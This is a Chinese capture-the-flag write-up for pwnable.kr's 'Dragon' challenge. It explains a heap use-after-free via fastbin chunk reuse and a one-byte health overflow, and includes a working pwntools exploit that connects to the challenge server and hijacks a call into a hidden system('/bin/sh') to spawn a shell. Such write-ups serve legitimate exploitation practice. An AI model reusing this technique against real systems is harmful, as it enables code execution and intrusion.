Pwnable.kr

Dragon —— 堆之 uaf

开始堆的学习之旅。

　　uaf漏洞利用到了堆的管理中fastbin的特性，关于堆的各种分配方式参见堆之*bin理解

　　在SecretLevel函数中，发现了隐藏的system("/bin/sh")调用，虽然无法直接执行，但无疑会是后续进展中的有力武器。

　　在和恐龙战斗的函数结束部分，发现了free掉但没有置空的free(dragon)语句，而在对战胜利后恰有开辟相同大小的空间，并自主写入的部分，由此产生了uaf漏洞。

　　>>在将dragon的结构体free之后，所指的内存空间会“挂”在fastbin数组下等待下次调用，而没有置空的、原来指向被free空间的dragon指针仍然指向该空间，仍可以在函数中被使用，而之后v2申请的大小和被free的空间的大小相同，会优先从fastbin数组中“摘下来”，此时v2和dragon指针都指向同一块内存空间，所以可以通过对v2的输入和对dragon的调用，实现任意代码执行，所以只要将之前的system（“/bin/sh”）段的地址写入v2，就能获得shell

　　这个游戏无法通过正常操作获得胜利，但是龙的生命只有一个byte即最多达到127，不断增长的情况下就可能实现溢出导致生命为负，使用有无敌和回技能点的第一个英雄配合母龙很容易达到。

exp：

 #!/usr/bin/env python
 # -*-coding=utf-8-*-
 from pwn import *
 # context.log_level = 'debug'
 # io = process("./dragon")
 io = remote("pwnable.kr",9004)
 elf = ELF("./dragon")
 
 binsh = 0x804935c
 sys_addr = elf.symbols["system"]
 call_sys = 0x8048dbf
 # to pretend to be defeated at first
 io.recvuntil("night\n")
 io.sendline("")
 io.recvuntil("cible.\n")
 io.sendline("")
 io.recvuntil("cible.\n")
 io.sendline("")
 io.recvuntil("night\n")
 io.sendline("")
 # to track the mom dragon come out and make it overflow
 for i in range (4):
     io.recvuntil("ble.\n")
     io.sendline("")
     io.recvuntil("ble.\n")
     io.sendline("")
     io.recvuntil("ble.\n")
     io.sendline("")
 io.recvuntil("As:\n")
 # payload = p32(sys_addr) + p32(binsh)
 payload = p32(call_sys) + '\x00'*8
 io.send(payload)
 io.interactive()